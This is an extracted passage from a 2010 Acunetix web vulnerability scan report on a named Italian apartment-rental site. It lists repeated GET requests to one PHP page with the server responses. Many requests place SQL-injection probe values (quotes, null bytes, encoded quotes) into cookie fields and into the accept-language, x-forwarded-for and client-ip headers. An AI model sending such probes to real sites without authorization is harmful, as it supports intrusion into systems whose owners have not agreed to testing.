WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=JyI%3D;__utmb=177195445%2E0%2E10%2E1266780517;__utmc=177195445;__utmz=177195445%2 E1266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%2 9 Connection: Close Pragma: no-cache Acunetix Website Audit 30
  31. 31. Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=%00';__ut mc=177195445;__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%2 8direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=JyI%3D;__ utmc=177195445;__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D %28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:32 GMT Acunetix Website Audit 31
  32. 32. Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=acunetix' ";__utmc=177195445;__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmcc n%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=";__utmc =177195445;__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%28d irect%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 32
  33. 33. /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=';__utmc =177195445;__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%28d irect%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=';__utmc= 177195445;__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D%28di rect%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* Acunetix Website Audit 33
  34. 34. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=%2527;__u tmc=177195445;__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28direct%29%7Cutmccn%3D% 28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=";__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28dir ect%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=JyI%3D;__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%2 8direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix Website Audit 34
  35. 35. Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=%2527;__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28 direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=%00';__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28d irect%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:37 GMT Acunetix Website Audit 35
  36. 36. Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=';__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28dire ct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=acunetix'";__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr% 3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 36
  37. 37. /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=';__utmz=177195445%2E1266780517%2E1%2E1%2Eutmcsr%3D%28dir ect%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=177195445;__utmz=' Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Acunetix Website Audit 37
  38. 38. Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=177195445;__utmz=acunetix'" Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=177195445;__utmz=" Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=177195445;__utmz=' Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response Acunetix Website Audit 38
  39. 39. HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=177195445;__utmz=%2527 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=177195445;__utmz=JyI%3D Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 39
  40. 40. /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445%2E606755828%2E1266780517%2E1266780517%2E1266780517%2E1;__utmb=177195445 %2E0%2E10%2E1266780517;__utmc=177195445;__utmz=%00' Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close accept-language: " Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* Acunetix Website Audit 40
  41. 41. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close accept-language: ' Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close accept-language: JyI= Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Acunetix Website Audit 41
  42. 42. Connection: Close accept-language: ' Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close accept-language: ' Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close accept-language: %27 Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit 42
  43. 43. Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close accept-language: acunetix'" Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close x-forwarded-for: acunetix'" Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:20 GMT Server: Microsoft-IIS/6.0 Acunetix Website Audit 43
  44. 44. X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close client-ip: acunetix'" Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 